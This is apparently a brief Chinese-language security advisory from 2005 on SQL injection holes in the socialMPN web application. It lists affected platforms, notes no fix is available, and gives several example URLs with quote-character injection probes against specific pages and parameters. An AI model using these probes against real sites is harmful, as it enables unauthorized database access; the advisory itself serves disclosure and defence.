漏洞名称: socialMPN Input Validation Holes Permit SQL Injection Attacks
漏洞编号: ICST-CA-2005-096
漏洞说明: socialMPN存在input validation error,远端攻击者可以利用恶意的参数对资料库系统下达SQL指令
底下是URL入侵范例
http://[target]/article.php?sid=%27
http://[target]/use r.php?uname='&pass=1&op=login
http://[target]/viewforum.php?forum=43&siteid=%2527
http://[target]/newtopic.php?username='&password=
http://[target]/sections.php? op=listarticles&secid=%27
http://[target]/sections.php?op=listarticles&artid=%2527
http://[target]/index.php?siteid='&op=show&aftersid=380
http://[target]/friend .php?sid=%2527&yname=1&ymail=1&fname=1&fmail=1&op=SendStory
影响平台: Linux
Unix
Windows
影响状况: 远端攻击者可以对资料库下SQL指令,并变更安装路径
解决方案: 目前尚无确切解决方案,详情请见
socialmpn.com... 参考资料: SecurityTracker.com